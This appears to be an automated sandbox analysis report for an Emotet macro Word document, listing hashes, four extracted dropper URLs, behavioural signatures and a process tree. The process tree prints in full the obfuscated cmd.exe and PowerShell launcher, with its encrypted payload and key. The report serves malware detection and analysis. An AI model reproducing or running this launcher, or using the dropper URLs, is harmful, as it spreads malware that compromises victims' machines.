Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    01/06/2024, 09:18

General

  • Target

    emotet_64.doc

  • Size

    180KB

  • MD5

    69b50cf495f52ceb5e3cbc26be0df1cb

  • SHA1

    3b3b8b489588b1ed21202e6f8fff3d15abbdd37a

  • SHA256

    74bac23bf452becf85cb38ee649a6c16dfa9f495455c2b5b873c47f0d71dbfd8

  • SHA512

    4c98c73ae91c396693d9594c1dc38afdddfc255ad4f7a07e9b5a00f4712575d4dcce141bc5efc9b5c0e172710449590c572d7bd34d47ea608b1d3f1a435cb54d

  • SSDEEP

    3072:C5083hrYbbYZD2zGT9nVBZRcQPh1gbrqy2o+AbfBcbD37fVbe8:CdhsbbYZD2KTFVBZ2Qqrqy26dwD37

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://nikitinskysport.ru/R5ytZ/

exe.dropper

http://beauty-tea.com/hB2JAMO/

exe.dropper

http://zekiatagur.com/gCWu/

exe.dropper

http://arkonziv.com/Site7_Pixelhobbies/iV1PKqL/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_64.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" dkZqOalQw LGubXkOnwiaUBOWcmBH OozhtfaG & %C^om^S^pEc% %C^om^S^pEc% /V /c set %WHwrpVZmmYHFRBn%=KuRuCJYsjvbW&&set %var1%=p&&set %var2%=ow&&set %AOFObKiMdHYYPUn%=EhvzzRRiwL&&set %var7%=!%var1%!&&set %OMjFHttDlXStiGS%=HCVsfhVAoCA&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %iZizbRPwVdYAffM%=PFLDoiWJOIDj&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! ". ( $ENv:cOMSpeC[4,15,25]-JOin'') ( ( [RunTIME.InteROpseRVIceS.mARSHaL]::PtrtoStRInGaUTO([rUNtimE.iNTErOpsERvIcES.MaRSHAl]::SeCUREsTrInGTobStr( $('76492d1116743f0423413b16050a5345MgB8AHQAMwBOAGcAawBuAGQAeAAwAFUAQwA5AGkAZwBDADIASwBSAHMASgB3AEEAPQA9AHwAZQA4AGMAOQA5AGYAYwA5ADYAMQA5ADAAOQBhADMANAAwADEAZQBiADYAZQA0AGIAZgAzAGUANABhADMAMgAwADIAZgA3AGEAOQA1AGEAYgBjADgAMABkADIAYwBmAGIANAA2AGEAYQA1ADUAYgBhADUAYQAwAGYANAAwAGYAZQBiADQANQAzADQAZgA5AGYAZQBhAGQAOQA0ADYAYwA0ADMANgA5AGIAYQA5ADIAMwBiADQAZQA1AGMAOAAwADgANABiADkANQBiAGEAMQBlADkAOAA4ADcAZQBlAGEAMwBkADkAZgAwADIAYwA2ADgAZgA0ADgAMQA0ADYAZgAwADIAYgBhAGIAOQAxAGYANABjADQANwA1AGIAOAAxADMAYQBlADIAYwBhAGEAYwAxAGMANwBkADAAYgA4ADAAMAA4ADEANQBiADUAYgAwAGMAYgAwADQAYgBkADEAYgBmADMANwA1AGEAMgAyADAAYwBkADIAZAA0AGQAMgBjADMAYgBlADQAOAA4AGEANAA2ADgANQAyAGUAYwA4ADAAMwBjAGMANAA4ADgANAAyAGIANwA1ADMAZgBjAGQAYQAwAGEAYwBkADQAYwBlAGIAMAA0ADEAZABmADEAMQBiAGYAMwA0ADYAYQA5ADYAZABlADgAYwA5AGUAZQBlADUAMABlADMAYwAxAGEAOAA0ADYANAA5ADMAMAAxADkAYQAwADEAOQBhADYAZABjAGEAZgA2ADUAOAA4ADYAZQBiAGUAZgA1ADIANAA4AGYANQBmAGMANgBkADkAYQAxAGEAMAA0ADcAYgAxADgANABhADcAYgBjADkAZABjAGQANAA1ADgANQAyAGIANgA2ADMAYgAzADQAMAA1ADMAYQA0ADIANQBhADYAZQA3ADcAMQA2AGMANAAyADYAYwA4ADAAYgBhADQAZABhADgANwBjAGUAMQA0AGIAZQAzADYAMQAzAGYAZgA0AGQAZgBmAGEANwAzADgANAA0AGIANgA4ADgAMgA3ADkAZQA4AGIANwBlADIAZQBhADkAMQBkAGMANQBmADAAOQBjADgANwAxADUAOQAyADMANwBhAGQANgA5ADEAOQA5AGEANABlADgANgBhADUANQBkADkAYwA2ADgANwBlADIANQBkADMAMgBhAGYAMAAzADQAMwBmADcAYwBhADUANAAzADkAYgBmAGMAOQAzADgAMwBhAGEAZgAxADIAZQBkADUAZQBkADgAMQBiAGEAYgBkAGUANgA1ADgAMgA1ADkAYQA4ADEAMgAxAGUAYQBkADkAMwAzAGIAYQBmADEANgA5ADIAMQAxADgAZQAwADAAZQA5AGUAZQA2ADgAMQBiADkANgAzAGIAOQBiAGEANwBlADkANwBkADAAYQBlAGYAOAAwADUANQBmADYAYgA5AGUAMQAyADIAYwBhADYAOQA5AGEAYgBjADEAYQA1AGQAYwBjADkAZgAwAGMAZQAwAGEAZgAxAGMANAA4AGMAZQA1ADgAZQBmADIAZgA3AGMAMQA2AGMAYwBkADEAOAA4ADkAMwBkAGYAMgA1ADQAMgAwADEAZAA0AGUAYwAyAGYAMwAwADkAOAAwAGYANABkAGYAYgAzADMAMAAzADQAZAA1ADcAMAA2ADgAMAA0AGMAMwBiAGIAYQAyADEAMwBiADkAZQAyAGEANwA5AGMAZAA5ADUAMABiADEANwA3AGEAYwAzADEAMgA1ADMAZQA2ADQAMgBiAGQAZQAxADUANgA5ADUANQBmADEAMwAzADUAZAAxADgAMQA4ADUAOAA2AGIAMwA2ADUAOQBiAGMANgAxADUAOQBkADcAMABkADEAMwA4AGQAYwA2AGIAMABiADYAZgA2ADQAYgBkAGMAZAAxADQAMABiADAAZgAyAGMANgAzAGUAYgBhADIANQAzAGYAMwAwADYANwA1AGMAOAA2AGIAMQAwADMAYwAwAGQAMgBkAGUAYwA1ADEAMwAxAGYAYgBlAGUANQA5AGYAOAA4ADcAOAAxAGUANQAzAGQAYQA1ADMAYgBkAGIAOQA4AGYAZQAwADkAMQBlADIANQAzADcANgA5ADcAOABmADcANAAzAGMAOABhADcAOQA4ADAAOQA2AGMAOAA1ADUAZQA1AGUAZAAxADQAYgAyADQANABhADIAYQBlADgAMgBkAGMANgAzAGYAMwBlADUANAA5AGEAMQAyAGEAMgA2ADYAOAA5ADkAZAA1AGUAZgAwAGMANgA2AGQAOQBlAGQAMABjADIAYwA1ADIAMQAxADUAMQBlAGUAMwAwADUAOAAxAGUAYgA0ADAAZQBhADkANgA1AGUAOQBlADMAMQBlAGQAZAAxADIANQA3AGEAMgA2ADMAYgA3ADYANgA1AGYAMQBhADIAZgAyADIANQBjADYAZABhAGUAMgBlAGMAYwAzAGEAOQBiADcANwBjADUAYQA2ADcAMgA2ADUAZAAyADkAYwA4AGQANwBlAGEANQA3ADEAZQA1ADYANQBkADAANgAyADMAYQAzADEANwAwADkAOQBhADcAMgBhADcAMAA4ADkAZgAzADkAYQBiADIAYQAxADcAZAA3ADUANAAxADkANgAyAGYAMAA1ADEAZABlAGUAZgA3ADgAYgBmADAAYQBlADgAOABjADEAMAA4ADIANwBjADkANQA1AGMANwA3AGEAZAAzADUAYQBlADgANwAxADQAMQBjAGEAYQBiAGQAYgA3AGIAMwBhADkAYgA2AGYAMwBhADEAMgA2AGYAYwAzADYANQBiAGIAZABhADAANAA5ADUAYQBjAGIANgAwADQANgAyADYANgA2ADYAZgBjAGEAYQAyAGEANwA4ADYAYQAyADAAZQA0ADMAMAAzADgAZAAxADYAOABmADAANABhAGEAOQBhADYAMABjADIANwA0AGYAYwBjAGEAYgBhAGQAOAAzAGUANgBkADEAZgAzADUANgAzAGYAZQBhAGIANwA1AGEAMQBhADYAYgBiAGMAZAA5ADUAZQA5ADYANAAzADYAMgA4AGIAOQAwADMAYgA4ADcAOAA5AGUAZgA3AGQAMwBjADkANQBhADUAZQA2ADgAYwBhADEAMwBjADQAOQBmAGIAOQBlADUAOAA0ADkAOQA3ADUAMwBhADkAMwBlADAAYwA1ADcAMABlADgANwBlAGEANgAxADIAMAA5ADAAOAA1AGMAYgA0ADAAYgBmADcANAA1ADMANwA1ADQAMgA2AGQAZAAzAGUAMwAwADYAYQBiADEAMQAxADMANQBmADUAYQBlADAAYwBlAGQAZABmAGIANgAwADUAMgA1ADQAZQBkAGUAYwAwAGIAYQA1AGMANQBjAGEANQA1ADEANwBjADEANgBiADAAMgBkADIAYgBhADEAZAA0ADcANwBlADgAYQBhADIAMAA5AGQANwBlAGIAOQBlADcAYgA1AGEAOAAzADQAMAA0AGQANgA3ADUAMgAwADYANgBhADYAZAAwADUAZQBjAGUANgA4AGIAOQBiAGMANgAzAGYAMwBiADcAOQBlADgAZgA2AGUAZAA1AGMAZgBiAGUAMQA5ADcAMwAyADgAMgBjAGUANwA2ADQAMABjAGQANAA2ADYANgAxADAAMwA1ADUAYQA2ADUAZgBiAGEAMQA3AGQAMAAyAGYAZABiADEAZgA0ADUAMwA4AGMANgA3AGQAYwAyADAAZQA3ADYAYQBhADQAOABkADcAYgBiADUANABiADcAZgBmADgAZgBmADgAZAAyADMAMwA1ADQAOQBiAGUAYgBiAGEAYwA3ADIAMAAxADYAZQA0ADcAOQA1ADEAYwAyAGEAOQBhADkAZQBkAGIAMgBmADkANABjAGEANQA2ADEAMwAwADEAYwBiADMAZQA0AGEAMgBhADcAOAAyAGUAMgA3ADYAMgBkADYANQA5ADMAZgAwAGYANwBhADQANQBlADgAZgBmAGUAYwBiADgAMQBiAGYANQA0ADcAOQAzAGQAYQBiADEAYgA0AGIAZgAxADMAYQBmAGEANAAyADAAZAA0ADIANABkADQANwAxADYAMQBjAGMAYQA1ADIAYgA1ADcANQA1ADUAYwBlADAANwA3AGUAMAAyADAAOABmAGUAOQAxADIAZQA4ADcAMQBmADgAYQA4AGIAYwA0ADMAZQBlAGYAZgBlADcAZABmADcANgAzADAAOQAyAGIAMwAzADkANQA2ADkAYgBlADEAMwA4ADQAYwAwADAAMgBmADQAZABhADcAYQBmAGQAYQBmAGEAMgBjAGQAYQAzADMAOQA0ADYAMQA1AGQAMgAyAGMANwAxADUANQBiADkANwBkADEANAAzADMAMAA2ADcAYgA0AGMAMgBiADgAZQAyADIANQBiAGQAMQBjAGIAYwAyAGYAYQBlADkAOAAxAGUAOQBhAGIAYQA1ADAAOQBhADkANgBmAGIANgAwADMAOAA3ADUAZQAwADIANAA2ADUANwBiADUAOQA4AGIAYwBhADYAYQA1ADUAYwBlADkAZgBmADgAZAAwAGUAYgBkAGMAYwBiADgANgAzAGQAOQA5ADYAZQAyAGMAMQA0ADgAZgAyADEAMABmAGQANQAxADMAOQBjAGEAZgBhADgANgBjADYAOQBiAGUANgA2ADEAMgAyADMANgAyADUANABlAGMAOQBkADcANQA4AGYAOABiADQAYwA4AGQAYQAzADEAMgAyADUAYQBkADAAYQAxADkAOQBlADEAMwBlAGEAMABlAGMANwA5ADYAZABlADIAMgA4ADUAMwA4AGIANgAzADcAMgBhADQANwA5ADcANgA0ADIAYgAwADMAMwAzADkAYwA5AGIAMAA2AGUAZQBjADUANQA1AGQAZAA3AGEAYwBmADUAMQAzADgAZQBhADAANAA5ADYAZAA5ADMAOQBmAGIAOABkADEANAA5ADMANAA5AGQAYQA2ADMAMwAxADYAOAAyADUAZAA0ADIAYwAyADAANAAwADIAYgA3AGYAZQAyADcAOQA1ADcAMwA5ADIANwAxADUAMgAwAGUAYgAwADYANQBlAGEANgBjADUANABlAGYAZABlADIAZgBkADgANgAyADUAOQBkAGQAZQBiADcANwBjADIAZABkAGIANwA5AGYAMwAwAGQAYgAyAGEAMQBiAGUAYQAyAGUANwA4ADMANAAyADAAYQAzAGEAYgAyAGIANAAyADUANgBkADkANwA5ADkANQA4ADQAZAA='| COnVeRttO-SeCuREstRINg -k 231,26,130,87,111,231,152,144,97,222,78,234,155,78,233,50,212,246,135,114,156,122,216,75) )) ) )
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell ". ( $ENv:cOMSpeC[4,15,25]-JOin'') ( ( [RunTIME.InteROpseRVIceS.mARSHaL]::PtrtoStRInGaUTO([rUNtimE.iNTErOpsERvIcES.MaRSHAl]::SeCUREsTrInGTobStr( $('76492d1116743f0423413b16050a5345MgB8AHQAMwBOAGcAawBuAGQAeAAwAFUAQwA5AGkAZwBDADIASwBSAHMASgB3AEEAPQA9AHwAZQA4AGMAOQA5AGYAYwA5ADYAMQA5ADAAOQBhADMANAAwADEAZQBiADYAZQA0AGIAZgAzAGUANABhADMAMgAwADIAZgA3AGEAOQA1AGEAYgBjADgAMABkADIAYwBmAGIANAA2AGEAYQA1ADUAYgBhADUAYQAwAGYANAAwAGYAZQBiADQANQAzADQAZgA5AGYAZQBhAGQAOQA0ADYAYwA0ADMANgA5AGIAYQA5ADIAMwBiADQAZQA1AGMAOAAwADgANABiADkANQBiAGEAMQBlADkAOAA4ADcAZQBlAGEAMwBkADkAZgAwADIAYwA2ADgAZgA0ADgAMQA0ADYAZgAwADIAYgBhAGIAOQAxAGYANABjADQANwA1AGIAOAAxADMAYQBlADIAYwBhAGEAYwAxAGMANwBkADAAYgA4ADAAMAA4ADEANQBiADUAYgAwAGMAYgAwADQAYgBkADEAYgBmADMANwA1AGEAMgAyADAAYwBkADIAZAA0AGQAMgBjADMAYgBlADQAOAA4AGEANAA2ADgANQAyAGUAYwA4ADAAMwBjAGMANAA4ADgANAAyAGIANwA1ADMAZgBjAGQAYQAwAGEAYwBkADQAYwBlAGIAMAA0ADEAZABmADEAMQBiAGYAMwA0ADYAYQA5ADYAZABlADgAYwA5AGUAZQBlADUAMABlADMAYwAxAGEAOAA0ADYANAA5ADMAMAAxADkAYQAwADEAOQBhADYAZABjAGEAZgA2ADUAOAA4ADYAZQBiAGUAZgA1ADIANAA4AGYANQBmAGMANgBkADkAYQAxAGEAMAA0ADcAYgAxADgANABhADcAYgBjADkAZABjAGQANAA1ADgANQAyAGIANgA2ADMAYgAzADQAMAA1ADMAYQA0ADIANQBhADYAZQA3ADcAMQA2AGMANAAyADYAYwA4ADAAYgBhADQAZABhADgANwBjAGUAMQA0AGIAZQAzADYAMQAzAGYAZgA0AGQAZgBmAGEANwAzADgANAA0AGIANgA4ADgAMgA3ADkAZQA4AGIANwBlADIAZQBhADkAMQBkAGMANQBmADAAOQBjADgANwAxADUAOQAyADMANwBhAGQANgA5ADEAOQA5AGEANABlADgANgBhADUANQBkADkAYwA2ADgANwBlADIANQBkADMAMgBhAGYAMAAzADQAMwBmADcAYwBhADUANAAzADkAYgBmAGMAOQAzADgAMwBhAGEAZgAxADIAZQBkADUAZQBkADgAMQBiAGEAYgBkAGUANgA1ADgAMgA1ADkAYQA4ADEAMgAxAGUAYQBkADkAMwAzAGIAYQBmADEANgA5ADIAMQAxADgAZQAwADAAZQA5AGUAZQA2ADgAMQBiADkANgAzAGIAOQBiAGEANwBlADkANwBkADAAYQBlAGYAOAAwADUANQBmADYAYgA5AGUAMQAyADIAYwBhADYAOQA5AGEAYgBjADEAYQA1AGQAYwBjADkAZgAwAGMAZQAwAGEAZgAxAGMANAA4AGMAZQA1ADgAZQBmADIAZgA3AGMAMQA2AGMAYwBkADEAOAA4ADkAMwBkAGYAMgA1ADQAMgAwADEAZAA0AGUAYwAyAGYAMwAwADkAOAAwAGYANABkAGYAYgAzADMAMAAzADQAZAA1ADcAMAA2ADgAMAA0AGMAMwBiAGIAYQAyADEAMwBiADkAZQAyAGEANwA5AGMAZAA5ADUAMABiADEANwA3AGEAYwAzADEAMgA1ADMAZQA2ADQAMgBiAGQAZQAxADUANgA5ADUANQBmADEAMwAzADUAZAAxADgAMQA4ADUAOAA2AGIAMwA2ADUAOQBiAGMANgAxADUAOQBkADcAMABkADEAMwA4AGQAYwA2AGIAMABiADYAZgA2ADQAYgBkAGMAZAAxADQAMABiADAAZgAyAGMANgAzAGUAYgBhADIANQAzAGYAMwAwADYANwA1AGMAOAA2AGIAMQAwADMAYwAwAGQAMgBkAGUAYwA1ADEAMwAxAGYAYgBlAGUANQA5AGYAOAA4ADcAOAAxAGUANQAzAGQAYQA1ADMAYgBkAGIAOQA4AGYAZQAwADkAMQBlADIANQAzADcANgA5ADcAOABmADcANAAzAGMAOABhADcAOQA4ADAAOQA2AGMAOAA1ADUAZQA1AGUAZAAxADQAYgAyADQANABhADIAYQBlADgAMgBkAGMANgAzAGYAMwBlADUANAA5AGEAMQAyAGEAMgA2ADYAOAA5ADkAZAA1AGUAZgAwAGMANgA2AGQAOQBlAGQAMABjADIAYwA1ADIAMQAxADUAMQBlAGUAMwAwADUAOAAxAGUAYgA0ADAAZQBhADkANgA1AGUAOQBlADMAMQBlAGQAZAAxADIANQA3AGEAMgA2ADMAYgA3ADYANgA1AGYAMQBhADIAZgAyADIANQBjADYAZABhAGUAMgBlAGMAYwAzAGEAOQBiADcANwBjADUAYQA2ADcAMgA2ADUAZAAyADkAYwA4AGQANwBlAGEANQA3ADEAZQA1ADYANQBkADAANgAyADMAYQAzADEANwAwADkAOQBhADcAMgBhADcAMAA4ADkAZgAzADkAYQBiADIAYQAxADcAZAA3ADUANAAxADkANgAyAGYAMAA1ADEAZABlAGUAZgA3ADgAYgBmADAAYQBlADgAOABjADEAMAA4ADIANwBjADkANQA1AGMANwA3AGEAZAAzADUAYQBlADgANwAxADQAMQBjAGEAYQBiAGQAYgA3AGIAMwBhADkAYgA2AGYAMwBhADEAMgA2AGYAYwAzADYANQBiAGIAZABhADAANAA5ADUAYQBjAGIANgAwADQANgAyADYANgA2ADYAZgBjAGEAYQAyAGEANwA4ADYAYQAyADAAZQA0ADMAMAAzADgAZAAxADYAOABmADAANABhAGEAOQBhADYAMABjADIANwA0AGYAYwBjAGEAYgBhAGQAOAAzAGUANgBkADEAZgAzADUANgAzAGYAZQBhAGIANwA1AGEAMQBhADYAYgBiAGMAZAA5ADUAZQA5ADYANAAzADYAMgA4AGIAOQAwADMAYgA4ADcAOAA5AGUAZgA3AGQAMwBjADkANQBhADUAZQA2ADgAYwBhADEAMwBjADQAOQBmAGIAOQBlADUAOAA0ADkAOQA3ADUAMwBhADkAMwBlADAAYwA1ADcAMABlADgANwBlAGEANgAxADIAMAA5ADAAOAA1AGMAYgA0ADAAYgBmADcANAA1ADMANwA1ADQAMgA2AGQAZAAzAGUAMwAwADYAYQBiADEAMQAxADMANQBmADUAYQBlADAAYwBlAGQAZABmAGIANgAwADUAMgA1ADQAZQBkAGUAYwAwAGIAYQA1AGMANQBjAGEANQA1ADEANwBjADEANgBiADAAMgBkADIAYgBhADEAZAA0ADcANwBlADgAYQBhADIAMAA5AGQANwBlAGIAOQBlADcAYgA1AGEAOAAzADQAMAA0AGQANgA3ADUAMgAwADYANgBhADYAZAAwADUAZQBjAGUANgA4AGIAOQBiAGMANgAzAGYAMwBiADcAOQBlADgAZgA2AGUAZAA1AGMAZgBiAGUAMQA5ADcAMwAyADgAMgBjAGUANwA2ADQAMABjAGQANAA2ADYANgAxADAAMwA1ADUAYQA2ADUAZgBiAGEAMQA3AGQAMAAyAGYAZABiADEAZgA0ADUAMwA4AGMANgA3AGQAYwAyADAAZQA3ADYAYQBhADQAOABkADcAYgBiADUANABiADcAZgBmADgAZgBmADgAZAAyADMAMwA1ADQAOQBiAGUAYgBiAGEAYwA3ADIAMAAxADYAZQA0ADcAOQA1ADEAYwAyAGEAOQBhADkAZQBkAGIAMgBmADkANABjAGEANQA2ADEAMwAwADEAYwBiADMAZQA0AGEAMgBhADcAOAAyAGUAMgA3ADYAMgBkADYANQA5ADMAZgAwAGYANwBhADQANQBlADgAZgBmAGUAYwBiADgAMQBiAGYANQA0ADcAOQAzAGQAYQBiADEAYgA0AGIAZgAxADMAYQBmAGEANAAyADAAZAA0ADIANABkADQANwAxADYAMQBjAGMAYQA1ADIAYgA1ADcANQA1ADUAYwBlADAANwA3AGUAMAAyADAAOABmAGUAOQAxADIAZQA4ADcAMQBmADgAYQA4AGIAYwA0ADMAZQBlAGYAZgBlADcAZABmADcANgAzADAAOQAyAGIAMwAzADkANQA2ADkAYgBlADEAMwA4ADQAYwAwADAAMgBmADQAZABhADcAYQBmAGQAYQBmAGEAMgBjAGQAYQAzADMAOQA0ADYAMQA1AGQAMgAyAGMANwAxADUANQBiADkANwBkADEANAAzADMAMAA2ADcAYgA0AGMAMgBiADgAZQAyADIANQBiAGQAMQBjAGIAYwAyAGYAYQBlADkAOAAxAGUAOQBhAGIAYQA1ADAAOQBhADkANgBmAGIANgAwADMAOAA3ADUAZQAwADIANAA2ADUANwBiADUAOQA4AGIAYwBhADYAYQA1ADUAYwBlADkAZgBmADgAZAAwAGUAYgBkAGMAYwBiADgANgAzAGQAOQA5ADYAZQAyAGMAMQA0ADgAZgAyADEAMABmAGQANQAxADMAOQBjAGEAZgBhADgANgBjADYAOQBiAGUANgA2ADEAMgAyADMANgAyADUANABlAGMAOQBkADcANQA4AGYAOABiADQAYwA4AGQAYQAzADEAMgAyADUAYQBkADAAYQAxADkAOQBlADEAMwBlAGEAMABlAGMANwA5ADYAZABlADIAMgA4ADUAMwA4AGIANgAzADcAMgBhADQANwA5ADcANgA0ADIAYgAwADMAMwAzADkAYwA5AGIAMAA2AGUAZQBjADUANQA1AGQAZAA3AGEAYwBmADUAMQAzADgAZQBhADAANAA5ADYAZAA5ADMAOQBmAGIAOABkADEANAA5ADMANAA5AGQAYQA2ADMAMwAxADYAOAAyADUAZAA0ADIAYwAyADAANAAwADIAYgA3AGYAZQAyADcAOQA1ADcAMwA5ADIANwAxADUAMgAwAGUAYgAwADYANQBlAGEANgBjADUANABlAGYAZABlADIAZgBkADgANgAyADUAOQBkAGQAZQBiADcANwBjADIAZABkAGIANwA5AGYAMwAwAGQAYgAyAGEAMQBiAGUAYQAyAGUANwA4ADMANAAyADAAYQAzAGEAYgAyAGIANAAyADUANgBkADkANwA5ADkANQA4ADQAZAA='| COnVeRttO-SeCuREstRINg -k 231,26,130,87,111,231,152,144,97,222,78,234,155,78,233,50,212,246,135,114,156,122,216,75) )) ) )
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2696
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1656

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            efdb00d62c8bf4963ebc6766e39c0e31

            SHA1

            2ef0d99dccc73343d95c3cb5d406b7732b478935

            SHA256

            83cb82a1d9dfec868a46b62b4d3f0cfd2953e79d67711c054928f0b3f6e3e3ff

            SHA512

            972dd2ae32bf9ffc2356f2bb4854eb86927b7799c643ab6f988545d9196ad58633485c1f77ecd8366592c6efdd8a7e064b241a92c626c11e8fd0abb3359934fb

          • memory/1984-27-0x0000000000780000-0x0000000000880000-memory.dmp

            Filesize

            1024KB

          • memory/1984-37-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-5-0x0000000000780000-0x0000000000880000-memory.dmp

            Filesize

            1024KB

          • memory/1984-9-0x0000000000780000-0x0000000000880000-memory.dmp

            Filesize

            1024KB

          • memory/1984-10-0x0000000000780000-0x0000000000880000-memory.dmp

            Filesize

            1024KB

          • memory/1984-8-0x0000000000780000-0x0000000000880000-memory.dmp

            Filesize

            1024KB

          • memory/1984-7-0x0000000000780000-0x0000000000880000-memory.dmp

            Filesize

            1024KB

          • memory/1984-6-0x0000000000780000-0x0000000000880000-memory.dmp

            Filesize

            1024KB

          • memory/1984-11-0x0000000000780000-0x0000000000880000-memory.dmp

            Filesize

            1024KB

          • memory/1984-20-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-24-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-32-0x0000000000780000-0x0000000000880000-memory.dmp

            Filesize

            1024KB

          • memory/1984-40-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-0-0x000000002FA71000-0x000000002FA72000-memory.dmp

            Filesize

            4KB

          • memory/1984-2-0x0000000070FCD000-0x0000000070FD8000-memory.dmp

            Filesize

            44KB

          • memory/1984-34-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-35-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-41-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-39-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-33-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-26-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-36-0x0000000000780000-0x0000000000880000-memory.dmp

            Filesize

            1024KB

          • memory/1984-42-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-25-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-56-0x0000000070FCD000-0x0000000070FD8000-memory.dmp

            Filesize

            44KB

          • memory/1984-57-0x0000000000780000-0x0000000000880000-memory.dmp

            Filesize

            1024KB

          • memory/1984-58-0x0000000006190000-0x0000000006290000-memory.dmp

            Filesize

            1024KB

          • memory/1984-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1984-73-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1984-74-0x0000000070FCD000-0x0000000070FD8000-memory.dmp

            Filesize

            44KB